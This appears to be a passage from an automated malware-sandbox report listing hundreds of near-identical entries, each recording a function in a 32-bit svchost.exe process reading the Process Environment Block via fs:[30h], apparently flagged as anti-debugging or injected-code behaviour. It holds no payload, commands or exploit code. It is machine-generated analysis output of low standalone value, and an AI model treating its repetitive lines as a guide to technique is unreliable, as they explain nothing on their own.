Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h] 8_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h] 8_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h] 8_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h] 8_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h] 8_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h] 8_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 8_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 8_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 8_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038663FF mov eax, dword ptr fs:[00000030h] 8_2_038663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386A30B mov eax, dword ptr fs:[00000030h] 8_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386A30B mov eax, dword ptr fs:[00000030h] 8_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386A30B mov eax, dword ptr fs:[00000030h] 8_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0382C310 mov ecx, dword ptr fs:[00000030h] 8_2_0382C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03850310 mov ecx, dword ptr fs:[00000030h] 8_2_03850310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03908324 mov eax, dword ptr fs:[00000030h] 8_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03908324 mov ecx, dword ptr fs:[00000030h] 8_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03908324 mov eax, dword ptr fs:[00000030h] 8_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03908324 mov eax, dword ptr fs:[00000030h] 8_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B035C mov eax, dword ptr fs:[00000030h] 8_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B035C mov eax, dword ptr fs:[00000030h] 8_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B035C mov eax, dword ptr fs:[00000030h] 8_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B035C mov ecx, dword ptr fs:[00000030h] 8_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B035C mov eax, dword ptr fs:[00000030h] 8_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B035C mov eax, dword ptr fs:[00000030h] 8_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038FA352 mov eax, dword ptr fs:[00000030h] 8_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D8350 mov ecx, dword ptr fs:[00000030h] 8_2_038D8350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0390634F mov eax, dword ptr fs:[00000030h] 8_2_0390634F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D437C mov eax, dword ptr fs:[00000030h] 8_2_038D437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386E284 mov eax, dword ptr fs:[00000030h] 8_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386E284 mov eax, dword ptr fs:[00000030h] 8_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B0283 mov eax, dword ptr fs:[00000030h] 8_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B0283 mov eax, dword ptr fs:[00000030h] 8_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B0283 mov eax, dword ptr fs:[00000030h] 8_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038402A0 mov eax, dword ptr fs:[00000030h] 8_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038402A0 mov eax, dword ptr fs:[00000030h] 8_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038C62A0 mov eax, dword ptr fs:[00000030h] 8_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038C62A0 mov ecx, dword ptr fs:[00000030h] 8_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038C62A0 mov eax, dword ptr fs:[00000030h] 8_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038C62A0 mov eax, dword ptr fs:[00000030h] 8_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038C62A0 mov eax, dword ptr fs:[00000030h] 8_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038C62A0 mov eax, dword ptr fs:[00000030h] 8_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 8_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 8_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 8_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 8_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 8_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_039062D6 mov eax, dword ptr fs:[00000030h] 8_2_039062D6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038402E1 mov eax, dword ptr fs:[00000030h] 8_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038402E1 mov eax, dword ptr fs:[00000030h] 8_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038402E1 mov eax, dword ptr fs:[00000030h] 8_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0382823B mov eax, dword ptr fs:[00000030h] 8_2_0382823B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B8243 mov eax, dword ptr fs:[00000030h] 8_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B8243 mov ecx, dword ptr fs:[00000030h] 8_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0390625D mov eax, dword ptr fs:[00000030h] 8_2_0390625D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0382A250 mov eax, dword ptr fs:[00000030h] 8_2_0382A250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03836259 mov eax, dword ptr fs:[00000030h] 8_2_03836259
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038EA250 mov eax, dword ptr fs:[00000030h] 8_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038EA250 mov eax, dword ptr fs:[00000030h] 8_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03834260 mov eax, dword ptr fs:[00000030h] 8_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03834260 mov eax, dword ptr fs:[00000030h] 8_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03834260 mov eax, dword ptr fs:[00000030h] 8_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0382826B mov eax, dword ptr fs:[00000030h] 8_2_0382826B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03870185 mov eax, dword ptr fs:[00000030h] 8_2_03870185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038EC188 mov eax, dword ptr fs:[00000030h] 8_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038EC188 mov eax, dword ptr fs:[00000030h] 8_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D4180 mov eax, dword ptr fs:[00000030h] 8_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D4180 mov eax, dword ptr fs:[00000030h] 8_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B019F mov eax, dword ptr fs:[00000030h] 8_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B019F mov eax, dword ptr fs:[00000030h] 8_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B019F mov eax, dword ptr fs:[00000030h] 8_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B019F mov eax, dword ptr fs:[00000030h] 8_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0382A197 mov eax, dword ptr fs:[00000030h] 8_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0382A197 mov eax, dword ptr fs:[00000030h] 8_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0382A197 mov eax, dword ptr fs:[00000030h] 8_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038F61C3 mov eax, dword ptr fs:[00000030h] 8_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038F61C3 mov eax, dword ptr fs:[00000030h] 8_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 8_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 8_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038AE1D0 mov ecx, dword ptr fs:[00000030h] 8_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 8_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 8_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_039061E5 mov eax, dword ptr fs:[00000030h] 8_2_039061E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038601F8 mov eax, dword ptr fs:[00000030h] 8_2_038601F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DE10E mov eax, dword ptr fs:[00000030h] 8_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DE10E mov ecx, dword ptr fs:[00000030h] 8_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DE10E mov eax, dword ptr fs:[00000030h] 8_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DE10E mov eax, dword ptr fs:[00000030h] 8_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DE10E mov ecx, dword ptr fs:[00000030h] 8_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DE10E mov eax, dword ptr fs:[00000030h] 8_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DE10E mov eax, dword ptr fs:[00000030h] 8_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DE10E mov ecx, dword ptr fs:[00000030h] 8_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DE10E mov eax, dword ptr fs:[00000030h] 8_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DE10E mov ecx, dword ptr fs:[00000030h] 8_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DA118 mov ecx, dword ptr fs:[00000030h] 8_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DA118 mov eax, dword ptr fs:[00000030h] 8_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DA118 mov eax, dword ptr fs:[00000030h] 8_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DA118 mov eax, dword ptr fs:[00000030h] 8_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038F0115 mov eax, dword ptr fs:[00000030h] 8_2_038F0115
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03860124 mov eax, dword ptr fs:[00000030h] 8_2_03860124
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038C4144 mov eax, dword ptr fs:[00000030h] 8_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038C4144 mov eax, dword ptr fs:[00000030h] 8_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038C4144 mov ecx, dword ptr fs:[00000030h] 8_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038C4144 mov eax, dword ptr fs:[00000030h] 8_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038C4144 mov eax, dword ptr fs:[00000030h] 8_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0382C156 mov eax, dword ptr fs:[00000030h] 8_2_0382C156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038C8158 mov eax, dword ptr fs:[00000030h] 8_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03836154 mov eax, dword ptr fs:[00000030h] 8_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03836154 mov eax, dword ptr fs:[00000030h] 8_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03904164 mov eax, dword ptr fs:[00000030h] 8_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03904164 mov eax, dword ptr fs:[00000030h] 8_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0383208A mov eax, dword ptr fs:[00000030h] 8_2_0383208A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038280A0 mov eax, dword ptr fs:[00000030h] 8_2_038280A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038C80A8 mov eax, dword ptr fs:[00000030h] 8_2_038C80A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038F60B8 mov eax, dword ptr fs:[00000030h] 8_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038F60B8 mov ecx, dword ptr fs:[00000030h] 8_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B20DE mov eax, dword ptr fs:[00000030h] 8_2_038B20DE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0382A0E3 mov ecx, dword ptr fs:[00000030h] 8_2_0382A0E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038380E9 mov eax, dword ptr fs:[00000030h] 8_2_038380E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B60E0 mov eax, dword ptr fs:[00000030h] 8_2_038B60E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0382C0F0 mov eax, dword ptr fs:[00000030h] 8_2_0382C0F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038720F0 mov ecx, dword ptr fs:[00000030h] 8_2_038720F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B4000 mov ecx, dword ptr fs:[00000030h] 8_2_038B4000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h] 8_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h] 8_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h] 8_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h] 8_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h] 8_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h] 8_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h] 8_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h] 8_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0384E016 mov eax, dword ptr fs:[00000030h] 8_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0384E016 mov eax, dword ptr fs:[00000030h] 8_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0384E016 mov eax, dword ptr fs:[00000030h] 8_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0384E016 mov eax, dword ptr fs:[00000030h] 8_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0382A020 mov eax, dword ptr fs:[00000030h] 8_2_0382A020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0382C020 mov eax, dword ptr fs:[00000030h] 8_2_0382C020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038C6030 mov eax, dword ptr fs:[00000030h] 8_2_038C6030
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03832050 mov eax, dword ptr fs:[00000030h] 8_2_03832050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B6050 mov eax, dword ptr fs:[00000030h] 8_2_038B6050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0385C073 mov eax, dword ptr fs:[00000030h] 8_2_0385C073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D678E mov eax, dword ptr fs:[00000030h] 8_2_038D678E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038307AF mov eax, dword ptr fs:[00000030h] 8_2_038307AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E47A0 mov eax, dword ptr fs:[00000030h] 8_2_038E47A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0383C7C0 mov eax, dword ptr fs:[00000030h] 8_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B07C3 mov eax, dword ptr fs:[00000030h] 8_2_038B07C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038527ED mov eax, dword ptr fs:[00000030h] 8_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038527ED mov eax, dword ptr fs:[00000030h] 8_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038527ED mov eax, dword ptr fs:[00000030h] 8_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038BE7E1 mov eax, dword ptr fs:[00000030h] 8_2_038BE7E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038347FB mov eax, dword ptr fs:[00000030h] 8_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038347FB mov eax, dword ptr fs:[00000030h] 8_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386C700 mov eax, dword ptr fs:[00000030h] 8_2_0386C700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03830710 mov eax, dword ptr fs:[00000030h] 8_2_03830710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03860710 mov eax, dword ptr fs:[00000030h] 8_2_03860710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386C720 mov eax, dword ptr fs:[00000030h] 8_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386C720 mov eax, dword ptr fs:[00000030h] 8_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386273C mov eax, dword ptr fs:[00000030h] 8_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386273C mov ecx, dword ptr fs:[00000030h] 8_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386273C mov eax, dword ptr fs:[00000030h] 8_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038AC730 mov eax, dword ptr fs:[00000030h] 8_2_038AC730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386674D mov esi, dword ptr fs:[00000030h] 8_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386674D mov eax, dword ptr fs:[00000030h] 8_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386674D mov eax, dword ptr fs:[00000030h] 8_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03830750 mov eax, dword ptr fs:[00000030h] 8_2_03830750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038BE75D mov eax, dword ptr fs:[00000030h] 8_2_038BE75D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872750 mov eax, dword ptr fs:[00000030h] 8_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872750 mov eax, dword ptr fs:[00000030h] 8_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B4755 mov eax, dword ptr fs:[00000030h] 8_2_038B4755
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03838770 mov eax, dword ptr fs:[00000030h] 8_2_03838770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03840770 mov eax, dword ptr fs:[00000030h] 8_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03840770 mov eax, dword ptr fs:[00000030h] 8_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03840770 mov eax, dword ptr fs:[00000030h] 8_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03840770 mov eax, dword ptr fs:[00000030h] 8_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03840770 mov eax, dword ptr fs:[00000030h] 8_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03840770 mov eax, dword ptr fs:[00000030h] 8_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03840770 mov eax, dword ptr fs:[00000030h] 8_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03840770 mov eax, dword ptr fs:[00000030h] 8_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03840770 mov eax, dword ptr fs:[00000030h] 8_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03840770 mov eax, dword ptr fs:[00000030h] 8_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03840770 mov eax, dword ptr fs:[00000030h] 8_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03840770 mov eax, dword ptr fs:[00000030h] 8_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03834690 mov eax, dword ptr fs:[00000030h] 8_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03834690 mov eax, dword ptr fs:[00000030h] 8_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386C6A6 mov eax, dword ptr fs:[00000030h] 8_2_0386C6A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038666B0 mov eax, dword ptr fs:[00000030h] 8_2_038666B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386A6C7 mov ebx, dword ptr fs:[00000030h] 8_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386A6C7 mov eax, dword ptr fs:[00000030h] 8_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038AE6F2 mov eax, dword ptr fs:[00000030h] 8_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038AE6F2 mov eax, dword ptr fs:[00000030h] 8_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038AE6F2 mov eax, dword ptr fs:[00000030h] 8_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038AE6F2 mov eax, dword ptr fs:[00000030h] 8_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B06F1 mov eax, dword ptr fs:[00000030h] 8_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B06F1 mov eax, dword ptr fs:[00000030h] 8_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038AE609 mov eax, dword ptr fs:[00000030h] 8_2_038AE609
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0384260B mov eax, dword ptr fs:[00000030h] 8_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0384260B mov eax, dword ptr fs:[00000030h] 8_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0384260B mov eax, dword ptr fs:[00000030h] 8_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0384260B mov eax, dword ptr fs:[00000030h] 8_2_0384260B
